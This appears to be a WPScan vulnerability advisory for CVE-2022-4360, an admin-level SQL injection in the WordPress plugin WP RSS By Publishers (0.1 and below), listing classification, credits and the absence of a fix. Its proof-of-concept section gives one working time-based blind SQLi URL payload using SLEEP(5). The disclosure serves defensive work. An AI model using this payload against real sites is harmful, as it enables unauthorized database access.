WordPress Plugin Vulnerabilities

WP RSS By Publishers <= 0.1 - Admin+ SQLi

Description

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin

Proof of Concept

https://example.com/wp-admin/admin.php?page=wsysadmin_publishers&action=delete&id=0,1)+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA

Affects Plugins

wp-rss-by-publishers

No known fix - plugin closed

References

CVE

CVE-2022-4360

URL

https://bulletin.iese.de/post/wp-rss-by-publishers_0-1_1

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

Miscellaneous

Original Researcher

Daniel Krohmer, Kunal Sharma

Submitter

Daniel Krohmer

Submitter website

https://www.iese.fraunhofer.de/en.html

Verified

Yes

WPVDB ID

40c420aa-5da0-42f9-a94f-f68ef57fcdae

Timeline

Publicly Published

2022-12-09 (about 5 months ago)

Added

2022-12-09 (about 5 months ago)

Last Updated

2022-12-09 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin